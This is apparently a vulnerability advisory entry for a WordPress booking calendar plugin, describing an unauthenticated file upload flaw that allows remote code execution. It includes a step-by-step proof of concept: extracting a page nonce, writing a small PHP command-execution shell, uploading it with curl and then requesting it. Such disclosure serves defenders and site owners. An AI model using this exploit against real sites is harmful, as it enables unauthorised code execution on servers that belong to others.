The plugin does not validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE
1. As an unauthenticated user, navigate to the main WordPress page 2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce") 3. Prepare a payload for upload: echo '<?php passthru("id"); ?>' > /tmp/poc.php 4. Upload the payload with cURL, with the previously extracted nonce: curl -i https://example.com/wp-admin/admin-ajax.php \ -F 'action=wpdevart_form_ajax' \ -F 'wpdevart_id=x' \ -F 'wpdevart_nonce=<NONCE HERE>' \ -F 'wpdevart_data={"wpdevart-submit":"X"}' \ -F 'wpdevart-submit=1' \ -F '[email protected]/tmp/poc.php' 5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>" curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php
UPLOAD
cydave
cydave
Yes
2022-11-21 (about 6 months ago)
2022-11-21 (about 6 months ago)
2023-01-27 (about 4 months ago)